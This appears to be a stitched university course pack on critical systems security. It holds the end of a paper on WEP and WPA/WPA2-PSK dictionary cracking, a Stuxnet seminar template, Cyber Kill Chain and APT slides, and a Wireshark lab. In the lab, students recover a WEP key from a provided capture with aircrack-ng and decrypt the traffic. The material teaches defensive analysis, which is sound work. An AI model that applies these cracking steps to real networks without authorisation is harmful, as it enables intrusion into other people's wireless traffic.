The supplicant sends the second message as a reply to the first EAPOL handshake message, carrying its SNonce in plain text to the authenticator together with a MIC computed with a keyed cryptographic hash (HMAC-SHA1) that proves the supplicant has installed the same key, as highlighted in figure 20. For each candidate passphrase the attacker derives a PTK, computes the MIC of the second EAPOL message and compares it with the captured MIC. If they are equal, the attacker has derived the same PTK and the passphrase is cracked.

Figure 20: Second Message of the WPA Four-way Handshake (SNonce, MIC and Client MAC Address)

The passphrase of the WPA/WPA2-PSK network was successfully obtained, as shown in figure 21, which also displays the PMK, the PTK and the MIC computed with HMAC-SHA1. The outcome of this study implies that WPA/WPA2-PSK is vulnerable to dictionary attack: an attacker can crack WPA/WPA2-PSK if the passphrase exists in the dictionary or wordlist.

Figure 21: Successful Crack of WPA/WPA2-PSK Passphrase

5. CONCLUSION
In assessing the security of IEEE 802.11 WLAN security protocols using penetration testing, it has been shown that both WEP and WPA/WPA2-PSK are vulnerable to attack. In WEP, the entire IV space is 24 bits, which is exhausted within a short time and causes IVs to repeat as more packets are generated. Cracking the WEP key depends on collecting enough weak IVs; once enough weak IVs have been gathered, the key is recovered. The aim of the CRC-32 checksum (ICV) is to verify data integrity by detecting alteration of packets in transit. However, the ICV is a linear function of the plaintext rather than a keyed function of the ciphertext, so an attacker can modify the ciphertext and adjust the ICV to match without knowing the key; the ICV therefore fails to achieve its aim. In the case of WPA/WPA2-PSK, the four-way handshake between the client and the AP is easily captured by an attacker, and the PMK and PTK can then be computed for candidate passphrases because everything else they depend on is contained in the captured handshake. WPA/WPA2-PSK will be cracked only if the passphrase exists in the attacker's wordlist or dictionary file, since only then will the correct PMK and PTK be determined.

6. REFERENCES
[1] Lee P., Stewart D. and Calugar-Pop C. (2014). Technology, Media & Telecommunications Predictions. London: Deloitte report, pp. 1-60.
[2] Waliullah Md., Moniruzzaman A. B. M. and Sadekur Rahman Md. (2015). An Experimental Study Analysis of Security Attacks at IEEE 802.11 Wireless Local Area Network. International Journal of Future Generation Communication and Networking, vol. 10, no. 4, pp. 9-18.
[3] Ola G. (2013). Penetration Testing on a Wireless Network Using Backtrack 5. Turku University of Applied Sciences.
[4] Chen Z., Guo S., Zheng K. and Li H. (2009). Research on Man-in-the-Middle Denial of Service Attack in SIP VoIP. Networks Security, Wireless Communications and Trusted Computing (NSWCTC), vol. 2, pp. 263-266, April 2009.
[5] Appiah J. K. (2014). Network and Systems Security Assessment using Penetration Testing in a University Environment: The Case of Central University College. Kwame Nkrumah University of Science and Technology, Kumasi.
[6] National Institute of Standards and Technology (NIST) (2008). Technical Guide to Information Security Testing and Assessment. Special Publication 800-115, Gaithersburg.

[7] Praveen L., Ravi S. Y. and Keshava R. M. (2011). Securing IEEE 802.11g WLAN Using OPENVPN and Its Impact Analysis. International Journal of Network Security & Its Applications (IJNSA), vol. 3, no. 6, November 2011.
[8] Kropeit T. (2015). Don't Trust Open Hotspots: Wi-Fi Hacker Detection and Privacy Protection via Smartphone. Ruhr-Universität Bochum.
[9] Forouzan B. (2008). Data Communications & Networking, 4th edition. New York: McGraw-Hill.
[10] L'ubomir Z. (2012). Security of Wi-Fi Networks. Comenius University, Bratislava.
[11] Bilger J., Cosand H., Singh N. and Xavier J. (2005). Security and Legal Implications of Wireless Networks, Protocols, and Devices.
[12] Shweta T., Pratim K., Sumedh K. and Aniket G. (2013). Study of Vulnerabilities of WLAN Security Protocols. Journal, Department of Computer Engineering, Fr. C. Rodrigues Institute of Technology, Vashi, Navi Mumbai, September 2013, pp. 109-112.
[13] Memon A. Q., Raza A. H. and Iqbal S. (2010). WLAN Security. Technical report IDE1013, Halmstad University School of Information Science, Computer and Electrical Engineering, April 2010.
[14] Kumkar V., Tiwari A., Tiwari P., Gupta A. and Shrawne S. (2012). Vulnerabilities of Wireless Security Protocols (WEP and WPA2). International Journal of Advanced Research in Computer Engineering & Technology, vol. 1, issue 2, April 2012.
[15] Park T., Wang H., Cho M. and Shin K. G. (2002). Enhanced Wired Equivalent Privacy for IEEE 802.11 Wireless LANs. The University of Michigan.
[16] Interop Net Labs (2002). "What's Wrong with WEP?" Retrieved from http://www.opus1.com/www/whitepapers/whatswrongwithwep.pdf (accessed May 10, 2018).
[17] Borisov N., Goldberg I. and Wagner D. (2001). Security of the WEP Algorithm. Retrieved from http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html (accessed April 24, 2018).
[18] Kiemele L. (2011). Wireless Network Security. V00154530.
[19] Zahur Y. and Yang T. (2004). Wireless LAN Security and Laboratory Designs. Journal of Computing Sciences in Colleges (CCSC), University of Houston Clear Lake, vol. 19, no. 3, January 2004, pp. 44-60.
[20] Bulbul H. I., Batmaz I. and Ozel M. (2008). Wireless Network Security: Comparison of WEP (Wired Equivalent Privacy) Mechanism, WPA (Wi-Fi Protected Access) and RSN (Robust Security Network) Security Protocols. Gazi University.
[21] Gupta S. (2012). Wireless Network Security Protocols: A Comparative Study. IJETAE, 2012.
[22] Alselwi A. (2015). Wireless Security Protocol in DNA Bio-Inspired Network. Liverpool John Moores University.
[23] Kurup L., Shah V. and Shah D. (2014). Comparative Study of Attacks on Security Protocols. International Journal of Advanced Research in Computer Engineering & Technology (IJARCET), vol. 3, issue 8, August 2014.
[24] Fluhrer S., Mantin I. and Shamir A. (2001). Weaknesses in the Key Scheduling Algorithm of RC4. Eighth Annual Workshop on Selected Areas in Cryptography, August 2001.
[25] Hulin K., Locke C., Mealey P. and Pham A. (2010). Analysis of Wireless Security Vulnerabilities, Attacks, and Methods of Protection. Information Security Semester Project, 2010.
[26] Robyns P. (2014). Wireless Network Privacy. Hasselt University.
[27] Zarch S. H. M., Jalilzadeh F. and Yazdanivaghef M. (2012). Encryption as an Impressive Instrumentation in Decrease Wireless WAN Vulnerabilities. International Journal of Scientific and Research Publications, vol. 2, issue 12, December 2012, ISSN 2250-3153.
[28] Papaleo G. (2006). Wireless Network Intrusion Detection System: Implementation and Architectural Issues. Università degli Studi di Genova.
[29] Ciampa M. D. (2012). Security+ Guide to Network Security Fundamentals. Course Technology, Cengage Learning.
[30] Laverty D. (n.d.). WPA versus 802.11i (WPA2): How your Choice Affects your Wireless Network Security. http://www.openxtra.co.uk/articles/wpa-vs-80211i.php
[31] Mkubulo D. (2007). Analysis of Wi-Fi Security Protocols and Authentication Delay. The Florida State University, FAMU-FSU College of Engineering.
[32] Vanhoef M. and Piessens F. (2017). Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2. imec-DistriNet, KU Leuven.
[33] Ramachandran V. (2011). BackTrack 5 Wireless Penetration Testing: Master Bleeding Edge Wireless Testing Techniques with BackTrack 5. Packt Publishing, Birmingham, UK.
[34] Noh J., Kim J. and Cho S. (2018). Secure Authentication and Four-Way Handshake Scheme for Protected Individual Communication in Public Wi-Fi Networks. IEEE Access, DOI 10.1109/ACCESS.2018.2809614.
[35] Kaplanis C. (2015). Detection and Prevention of Man in the Middle Attacks in Wi-Fi Technology.
[36] Stimpson T., Liu L., Zhang J., Hill R., Liu W. and Zhan Y. (2012). Assessment of Security and Vulnerability of Home Wireless Networks. IEEE 9th International Conference on Fuzzy Systems and Knowledge Discovery, Chongqing, China, 29-31 May 2012, pp. 2133-2137.



Structuring your Attack tree example

Start with the action, then move across to the steps; each step may have a sub-step, then the
mitigation (please highlight these)

Block access RFID (Action by attacker)


Shield Tag
Faraday cage
Around Reader
Around Tag
Vicinity of tag
Block Reader
Block Tag
Jam Signal

CSS Seminar template.

Objectives

Vulnerability name: STUXNET

Year first discovered:

How many devices infected / affected (what’s the scale of the vulnerability):

Who claimed responsible / been accused for the attack:

What/ who was its target:

How did it infect / spread:

What’s is the nature of the vulnerability (what did it exploit):

Provide examples of organisations / governments which have been affected by the vulnerability:

Overview of the vulnerability (use the examples above to provide a narrative of the vulnerability):

Iterations / mutations (include year mutant identified):

Is there capacity for the vulnerability to be exploited again, perhaps in a different setting? Explain:

Any other discerning characteristics of this vulnerability:


The Cyber Kill Chain model

UFCF7P-15-M - Critical Systems Security


Session Learning Outcomes
1. Understanding APT phases
2. Understanding the Cyber Kill Chain model

Advanced Persistent Threats (APTs)
• Advanced Persistent Threats (APTs) are sophisticated and targeted cyberattacks carried out by highly skilled adversaries with specific objectives.
• Advanced: They are targeted. They may employ more than one attack method and multiple spreading mechanisms to increase the probability of a successful attack on the target.
• Persistent: They operate in stealth mode for a prolonged period of time, ranging from months to years, until they reach the final target. Often, they hide their actions from monitoring software.

Advanced Persistent Threats (APTs): Examples
• SolarWinds: The SolarWinds cyberattack was a significant supply chain attack attributed
to APT29 (Cozy Bear), a Russian-state-sponsored APT group. The attackers compromised
the SolarWinds Orion software platform, used by thousands of organizations for IT
infrastructure management. This enabled the threat actors to infiltrate the networks of
multiple high-profile targets, including U.S. government agencies and Fortune 500
companies.
• Hafnium: Microsoft discovered a Chinese-state-sponsored APT group called Hafnium,
which targeted Microsoft Exchange Server vulnerabilities to gain access to email accounts
and exfiltrate sensitive data. Hafnium is known to target organizations in various sectors,
including defense, healthcare, and higher education.
• UNC2452 / Nobelium: An APT group also involved in the SolarWinds attack, continued its
cyber-espionage campaign targeting various organizations. In May 2021, Microsoft
disclosed that Nobelium had launched a new wave of attacks using the USAID email
system to distribute malicious phishing emails.
• APT41: A Chinese-state-sponsored APT group which targeted various industries
worldwide, including healthcare, telecommunications, and higher education. In 2020, the
U.S. Department of Justice (DOJ) charged five Chinese nationals for their involvement in
APT41 activities, including unauthorized access to protected computers and stealing
sensitive information.

https://www.hackerone.com/knowledge-center/advanced-persistent-threats-attack-stages-examples-and-mitigation

Advanced Persistent Threats (APTs): Steps
1. Reconnaissance: APT attackers begin by gathering information about the target organization, its employees, infrastructure, and security defences.
This may involve scanning publicly available information, social engineering tactics, and probing for vulnerabilities in the target's network.
2. Initial Compromise: Once attackers have identified potential vulnerabilities or entry points, they initiate the attack by exploiting weaknesses in the
target's systems or networks. This may involve exploiting software vulnerabilities, phishing emails, or other tactics to gain an initial foothold in the
target environment.
3. Establishment of Persistence: After gaining initial access, APT attackers take steps to establish persistence in the target environment. This involves
installing backdoors, remote access tools, or other malware to maintain access to the compromised systems even after security measures are
implemented.
4. Lateral Movement: With persistent access to the target network, APT attackers move laterally across the network to explore and compromise
additional systems and resources. This may involve exploiting weak credentials, escalating privileges, or exploiting misconfigured systems to gain
access to critical assets and data.
5. Data Exfiltration: Once APT attackers have compromised the target's systems and achieved their objectives, they begin to exfiltrate sensitive data
from the target environment. This may involve stealing intellectual property, customer data, financial information, or other valuable assets.
6. Covering Tracks: To avoid detection and maintain access to the compromised systems, APT attackers cover their tracks by deleting logs, modifying
timestamps, and obfuscating their activities. This makes it difficult for defenders to detect and respond to the attack.
7. Continued Monitoring and Persistence: Even after exfiltrating data or achieving their objectives, APT attackers may continue to monitor the target
environment for future opportunities or maintain access for future attacks. This allows them to maintain a persistent presence in the target
environment and carry out additional malicious activities over time.

Cyber Kill Chain model
• The Cyber Kill Chain model is a concept that describes the stages of a cyberattack, from initial reconnaissance to data exfiltration.
• The model provides a framework for understanding and analysing cyber threats, allowing organisations to better defend against and mitigate cyberattacks.

Cyber Kill Chain model steps

• Reconnaissance: Research, identification and collection of data about the target organization, encompassing its infrastructure,
staff, and security protocols. This process may entail scanning for vulnerabilities, gathering publicly accessible data, and
executing social engineering tactics.
• Weaponization: Once attackers have gathered information about the target, they develop or acquire tools and techniques to
exploit vulnerabilities in the target's systems. This may involve creating malware, crafting phishing emails, or exploiting known
software vulnerabilities.
• Delivery: Attackers deliver the weaponized payload to the target's systems. This can occur through various methods, such as
email attachments, malicious websites, or compromised network connections.
• Exploitation: In this stage, attackers exploit vulnerabilities in the target's systems to gain unauthorized access. This may
involve exploiting software vulnerabilities, misconfigurations, or weak authentication mechanisms to gain a foothold in the
target's network.
• Installation: Once attackers have gained access to the target's systems, they install backdoors, remote access tools, or other
malware to maintain persistence and establish control over the compromised systems.
• Command and Control (C2): Attackers establish communication channels with the compromised systems to remotely control
them and exfiltrate data. This may involve using command-and-control servers, remote administration tools, or covert
communication channels.
• Actions on Objectives: In this final stage, attackers achieve their objectives, which may include stealing sensitive data,
disrupting operations, or causing financial damage. This may involve exfiltrating data, modifying or deleting files, or launching
further attacks against other systems.

Cyber Kill Chain model steps/actions

Task 1
• Can you identify:
  • Examples of reconnaissance in ICS environments?
  • Weaponiser examples in ICS?
  • The prevalent transmission mechanisms in ICS?
  • Examples of attack against the user and/or attack against the system?
  • Examples of the Installation phase in ICS?
  • What is the difference in ICS for the 2 last phases?

Task 2 – What to do?
1. Study the Stuxnet scenario in the following slides.
2. What were the vulnerable points in the attack scenario?
3. Select another case study of your choice. Propose and discuss a scenario following the provided example.

STUXNET Attack scenario
• Primarily written to target an industrial control system or set of similar systems.
• Its final goal is to reprogram ICSs by modifying code on PLCs to make them work in a manner the attacker intended and to hide those changes from the operator of the equipment [6].

Stuxnet Attack scenario
• First, the attackers needed to conduct reconnaissance.
• As each PLC is configured in a unique manner, the attackers would first need the ICS's schematics. These design documents may have been stolen by an insider or even retrieved by other malware (an early version of Stuxnet or another malicious binary).
• The attackers would also have needed to obtain the digital certificates, possibly from someone who physically entered the premises of the two companies and stole them.
• The final version of Stuxnet couldn't have been developed without this knowledge [6].

Stuxnet Attack scenario
Attackers would need to set up a mirrored environment that would include the necessary ICS hardware, such as PLCs, modules and peripherals, in order to test their code. The full cycle may have taken six months and five to ten core developers, not counting numerous other individuals such as quality assurance and management [6].

This corresponds to the Weaponisation phase in the Cyber Kill Chain model (we'll talk about this in future lectures).

Stuxnet Attack scenario
• To infect their target, Stuxnet would need to be introduced into the target environment. This may have occurred by infecting a willing or unknowing third party, such as a contractor who perhaps had access to the facility, or an insider. The original infection may have been introduced by removable drive.
• Once Stuxnet had infected a computer within the organization it began to spread in search of Field PGs, which are typical Windows computers but used to program PLCs.

Stuxnet Attack scenario
• Since most of these computers (Field PGs) are non-networked, Stuxnet would first try to spread to other computers on the LAN through a zero-day vulnerability, a two-year-old vulnerability, infecting Step 7 projects, and through removable drives. Propagation through a LAN likely served as the first step and propagation through removable drives as a means to cover the last and final hop to a Field PG that is never connected to an untrusted network.

Stuxnet Attack scenario
• When Stuxnet finally found a suitable computer (Field PG), one that ran Step 7, it would then modify the code on the PLC. These modifications likely sabotaged the system.
• Victims attempting to verify the issue would not see any rogue PLC code, as Stuxnet hides its modifications.
Week 10 Critical Systems Security

Analysis of a Wireless Capture


LAB

Week 10
Week 10 Critical Systems Security

Objectives

 Use Wireshark and tshark to analyse wireless traffic for evidence of malicious activity
 Leverage knowledge of the relative strength or weakness of different wireless network configurations
to focus analysis on the points of an attacker may be more likely to target.
 Use penetration testing tools to access encrypted content protected by weaker mechanisms.

The Case: Analysis of a Wireless Capture


A Client informs you that before returning to University, a summer cyber security student commented that
the wireless network configuration was a joke. She saw numerous flaws in its configuration. In particular,
she said that the DNS-based block for typical "time-wasting" sites such as Facebook was utterly ineffective.
Unfortunately, before the administration team could get more details, the Cybersecurity student left.
The client never had much of a dedicated wireless skill set in-house since the Wi-Fi deployment was
entirely driven by the CEO's desire to have Apple iPads throughout the office to look "cool" for visitors.
Although well-intentioned, the client's IT and security teams could not adequately address the security
concerns associated with wireless networks, leaving what they admit is likely a massive hole in the
corporate security footprint.
However, the news of the ineffective Facebook block has "lit a fire" under the CEO who now considers the
wireless network the culprit for lost productivity around the office.

He has directed the IT and security departments to capture 15-20 minutes of network traffic so they can
"find and fix" the problem. The client hands you the pcap file and asks for your help in finding credible
answers to the boss's incredible questions.

To Prepare:
1. Log into UWECyber VM or Kali Linux VM
2. Create a working directory "CSS" on your desktop
3. Download the file "wireless.zip" from Blackboard, unzip it and copy the contents into the "CSS"
directory you created
4. Open the file "wireless.pcap" in Wireshark


1. Validate the client's WLAN SSIDs


Open the wireless.pcap file in Wireshark. In the "View → Name Resolution" menu, make sure that
"Enable for MAC Layer" is unticked. This causes Wireshark to display each MAC address as the raw six
hex bytes rather than a resolved vendor name, giving a cleaner view of the data.

Use Wireshark's "Statistics → WLAN Traffic" menu option to verify the list of SSIDs and BSSIDs contained
within the capture file. In the "WLAN Traffic Statistics" dialog box, ensure the "Only show existing
networks" option is checked. This option hides unknown networks from the statistical view.

The client has informed you that each of their four wireless network SSIDs contains the word "Target" in its
name, and that each name indicates the purpose of the respective wireless network. Additionally, the
client confirms that each SSID is served by one and only one access point.

a) Complete the table below with the listed data fields for the client's wireless networks. (Note that you
may need to resize data columns, or scroll to the right to get all data points)

BSSID | SSID | Security Type (WEP/WPA/WPA2) | 802.11 Channel

The algorithms that Wireshark uses to identify the security/protection type for a given WLAN are
somewhat limited, in that they prefer absolute positive identification over making erroneous
assumptions. Therefore, some configurations may show a blank value in the "Protection" column of the
WLAN Traffic Statistics dialog even though the WLAN uses encryption. In these cases, manual
verification is necessary.

For each of the client's BSSIDs without a listed Protection type, right-click the statistic row, then choose the
"Apply as Filter → Selected → BSSID" menu options. This will return you to the main Wireshark interface
with a display filter applied that matches only traffic to or from the selected network.
Find a "Beacon" frame, which contains a catalog of the capabilities the access point supports.


b) In the Packet Details pane, browse through the "Tagged Parameters" section of the Wireless LAN
Management Frame to see what you can learn or infer about the protection mechanisms used for each
BSSID. Pay attention to fields that contain information about Cipher Suites, Key Management, and
other standard WLAN security terms. Add your findings to the table above.
Remember that an access point can offer multiple security standards simultaneously, so review all
fields to ensure you completely characterise the capabilities of each SSID. Recall also that the "RSN"
security type is another name for "WPA2".

BSSID | SSID | Security Type (WEP/WPA/WPA2) | 802.11 Channel
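As an added illustration (not part of the lab handout), the following Python decodes the beacon fields that step 1(b) asks you to inspect by hand: the Privacy bit in Capability Info, the RSN information element (tag 48) and the WPA vendor-specific element (tag 221, OUI 00:50:F2), and derives the same kind of protection label Wireshark shows. The IE bytes and the SSID are constructed for the example.

```python
# Added example (not from the lab handout): decode the beacon fields that
# Wireshark's "Protection" column is derived from; all bytes are constructed.
import struct

# Suite selector = OUI(3) + type(1). 00-0F-AC is the IEEE/RSN OUI, 00-50-F2 the WPA OUI.
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKMS = {1: "802.1X", 2: "PSK"}
WPA_IE_PREFIX = b"\x00\x50\xf2\x01"   # Microsoft OUI + type 1 = WPA IE
RSN_TAG, VENDOR_TAG = 48, 221

def parse_suites(body, offset):
    """(pairwise ciphers, AKMs) from an RSN/WPA IE body; offset is past the version."""
    offset += 4                                   # skip group cipher suite
    count = struct.unpack_from("<H", body, offset)[0]
    offset += 2
    pairwise = [CIPHERS.get(body[offset + 4 * i + 3], "?") for i in range(count)]
    offset += 4 * count
    count = struct.unpack_from("<H", body, offset)[0]
    offset += 2
    return pairwise, [AKMS.get(body[offset + 4 * i + 3], "?") for i in range(count)]

def classify_beacon(capability, tagged):
    """Protection type from Capability Info and the Tagged Parameters (TLVs)."""
    found, i = [], 0
    while i + 2 <= len(tagged):
        tag, length = tagged[i], tagged[i + 1]
        body = tagged[i + 2:i + 2 + length]
        i += 2 + length
        if tag == RSN_TAG:
            pw, akm = parse_suites(body, 2)       # version(2) precedes suites
            found.append("WPA2/RSN %s %s" % ("+".join(pw), "+".join(akm)))
        elif tag == VENDOR_TAG and body[:4] == WPA_IE_PREFIX:
            pw, akm = parse_suites(body, 6)       # OUI(3)+type(1)+version(2)
            found.append("WPA %s %s" % ("+".join(pw), "+".join(akm)))
    if found:                        # an AP may advertise WPA and WPA2 together
        return ", ".join(found)
    # No RSN/WPA IE: Privacy bit (bit 4) alone implies WEP, otherwise Open.
    return "WEP" if capability & 0x0010 else "Open"

# Constructed IEs: RSN (tag 48) CCMP/PSK and WPA (tag 221) TKIP/PSK, plus an SSID tag.
RSN_CCMP_PSK = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac02 0000")
WPA_TKIP_PSK = bytes.fromhex("dd16 0050f201 0100 0050f202 0100 0050f202 0100 0050f202")
SSID_IE = b"\x00\x08Lab_SSID"       # hypothetical SSID

if __name__ == "__main__":
    print(classify_beacon(0x0401, SSID_IE))                              # Open
    print(classify_beacon(0x0411, SSID_IE))                              # WEP
    print(classify_beacon(0x0411, SSID_IE + RSN_CCMP_PSK + WPA_TKIP_PSK))
```

A beacon with the Privacy bit set but no RSN or WPA element is exactly the case that leaves Wireshark's Protection column blank, which is why the handout asks for manual verification.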

c) Recall that each access point's BSSID follows the same structure as a MAC address on the wired
network interface controller: three manufacturer-identifying bytes (called the OUI) followed by three
device-specific bytes. While not always the case, devices containing multiple hardware interfaces are
often assigned sequential hardware addresses. Return to the WLAN Traffic Statistics window and order
the results by BSSID by clicking the "BSSID" column header. What do you see in the cluster of the
client's known access points? What theories can you think of for this situation? Why do you think this is
the case? How did Wireshark get around this situation?


d) Apply a display filter to match the BSSID for the access point that provides this newly discovered
WLAN. (Right-Click the entry in the "WLAN Traffic Statistics" dialog, then select "Apply as Filter →
Selected → BSSID"). Examine each beacon frame. What do you notice is absent from the frame when
compared to those from the previous wireless networks? Why do you think this is the case? How did
Wireshark get around this situation?


2. Review the security of the various SSIDs and characterise communications


While this is a response-based investigation, it is still important to understand the weaknesses associated
with various WLAN security modes. In this case, the client has a policy regarding such configurations, but it
would also help to establish what routes an attacker might have used to conduct malicious activity. Most
attackers will take the path of least resistance while conducting their activities, meaning the "easy targets"
are often good investigative leads to follow.

a) Given the SSIDs identified above, rank them in order of least to most secure.

ORDER | SSID | SECURITY TYPE (WEP/WPA/WPA2) and KEY MGMT METHOD | NOTES

b) Given the non-compliant access point with the weakest security configuration, characterise
the activity that occurred using its SSID. First, list the hardware addresses that used this SSID. Then use
tshark with a display filter to limit traffic to the SSID in question and display the source address (wlan.sa)
and destination address (wlan.da) for each matching frame.
List the conversations you identify, and annotate the known and unknown hardware addresses.

# -r reads the capture file, -n disables name resolution, -T fields with -e
# selects the columns to print. Older Wireshark releases name the SSID field
# wlan_mgt.ssid instead of wlan.ssid.
tshark -n -r wireless.pcap -Y 'wlan.ssid == "Covert_WLAN"' \
    -T fields -e wlan.sa -e wlan.da | sort | uniq -c


c) For each unknown hardware address identified above, use tshark to identify the associated IP
address(es). Use a display filter that limits matched frames to those with the hardware address as the
sending station and that carry IP traffic, and display the source IP addresses. Then run the same
tshark command with the filter and displayed fields reversed, so that they reflect the destination
hardware address and destination IP address respectively.

d) With what other systems did the IP address(es) you just identified communicate, and with what layer
four protocols?


3. Check for subverting the DNS filter


Although not a primary focus of this investigation, the client's representative keeps asking you about
people getting around the filters they have in place through the OpenDNS service. In particular, he is
interested to know whether anyone is able to access Facebook, which is against corporate policy. You ask
whether determining if there was any traffic containing DNS queries for Facebook would address his
concerns. He agrees that this approach would be sufficient to test his theory.

a) What Wireshark display filter can you use to identify any DNS queries for Facebook-related domains
quickly? How many DNS lookups did this filter match?

b) Do you think this finding sufficiently addresses whether users may be subverting the DNS filter?


4. Identify weak encryption keys

We will attempt to decrypt the traffic from the protected WLANs to better address the client's question
about DNS subversion. Again, attacking the weakest link first is a reasonable approach. In this case, the
access point providing the Staff_Target_WLAN is the next in line. It uses WEP protection, which has long
been proven to be a trivially weak encryption standard.

Install the Aircrack-ng software, which can examine live network traffic or a pcap file to determine whether
the conditions are conducive to exploiting WEP's inherent weaknesses. If so, Aircrack-ng will recover the
WEP key.

a) Examine the command-line options for the "aircrack-ng" utility and then use it to attempt to
identify the WEP key in use. Write the command below and then identify the WEP key.
Refer to the man page if you are not familiar with Aircrack-ng's options.

This information gives two possible approaches to decrypting the WEP-protected traffic.
If the analytic workflow may include pcap-aware tools other than Wireshark, it is most useful to
create a second copy of the source pcap file in which all WEP-encrypted content is replaced with its
decrypted equivalent. The Airdecap-ng software, also installed on your SIFT Workstation,
provides this functionality.

b) Examine the command-line options for the "airdecap-ng" utility and then use it with the key above to
create a working copy of the source pcap file with the WEP encryption removed. Write the command
you use below.


5. Examine WEP-protected traffic


a) Now that you can examine the contents of the WEP-protected traffic, open the decrypted file in
Wireshark and re-apply the DNS query filter you identified above.
(Note that airdecap-ng writes its output to a new file named wireless-dec.pcap.)
How many results match the filter this time? For any results identified, what were the query and
the response?

